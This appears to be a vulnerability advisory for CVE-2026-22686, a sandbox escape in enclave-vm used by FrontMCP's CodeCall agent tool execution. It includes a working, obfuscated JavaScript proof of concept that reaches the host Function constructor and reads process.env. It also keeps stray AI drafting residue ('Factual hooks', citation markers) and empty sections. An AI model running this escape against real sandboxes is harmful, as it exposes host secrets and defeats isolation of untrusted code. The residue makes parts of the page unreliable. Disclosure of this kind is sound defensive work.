CVE-2026-22686 is a critical severity vulnerability with a CVSS score of 10.0. Exploits are available; patches have been released and should be applied urgently.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A critical sandbox escape vulnerability exists in enclave-vm (affected: < 2.6.0, patched: 2.7.0) that can allow untrusted, sandboxed JavaScript to execute arbitrary code in the host Node.js runtime.
When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor:
Error instance → Error.prototype → Error constructor → Function constructor
With access to the host Function constructor, an attacker can compile and execute arbitrary JavaScript in the host context — bypassing the sandbox boundary and potentially gaining access to sensitive resources such as process.env, filesystem, and network.
This breaks enclave-vm’s core security guarantee of isolating untrusted code.
FrontMCP is a TypeScript-first framework for building MCP servers, and the CodeCall plugin enables models to orchestrate large toolsets by generating and executing JavaScript plans.
Enclave is the defense-in-depth sandbox layer behind CodeCall (AST validation + runtime sandboxing). If you use FrontMCP CodeCall for agent tool execution, you should treat this as an urgent upgrade and ensure your runtime is on a patched enclave-vm version.
To explore Enclave’s execution model (AgentScript + tool calls) and validate your integration behavior, use the live playground:
This is the quickest way to understand the sandbox / tool-call flow and confirm your environment is running a patched setup.
[email protected] (Jan 9, 2026)Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
⚠️ For defensive validation and maintainers. Do not run PoCs on hosts you don’t own/control.
// Vector 35: The Host Error Escape
// Purpose: Trigger a Host-side error and traverse its prototype chain
// to reach the Host Function constructor.
const s = (...args) => String.fromCharCode(...args);
const kCon = s(99,111,110,115,116,114,117,99,116,111,114); // "constructor"
const kProto = s(95,95,112,114,111,116,111,95,95); // "__proto__"
const kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95);
const kCode = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118);
const kPtype = s(112,114,111,116,111,116,121,112,101);
try {
const ObjectProto = Object[kPtype];
const lookup = ObjectProto[kLookup];
const getProtoNative = lookup.call(ObjectProto, kProto);
let hostError;
try {
await callTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
} catch (e) {
hostError = e;
}
const errProto = getProtoNative.call(hostError);
const ErrorCtor = errProto[kCon];
const HostFunc = ErrorCtor[kCon];
const exploitFn = HostFunc(kCode);
return exploitFn();
} catch (e) {
return e.message;
}
Immediate action:
Defense-in-depth guidance:
Function constructors
Factual hooks (for correctness):
- GHSA page confirms **affected `<2.6.0`** and **patched `2.7.0`**, plus CVSS 10.0 and the exact vulnerability description. :contentReference[oaicite:0]{index=0}
- FrontMCP docs explicitly describe **CodeCall** and that it uses **Enclave (AST validation + runtime sandboxing)**. :contentReference[oaicite:1]{index=1}
- FrontMCP positioning (“TypeScript-first framework for MCP…”) is stated in the docs. :contentReference[oaicite:2]{index=2}
- Enclave repo links the **Live Demo** at `enclave.agentfront.dev`. :contentReference[oaicite:3]{index=3}
- Release listing shows `[email protected]` dated **Jan 9** (fast fix signal). :contentReference[oaicite:4]{index=4}
::contentReference[oaicite:5]{index=5}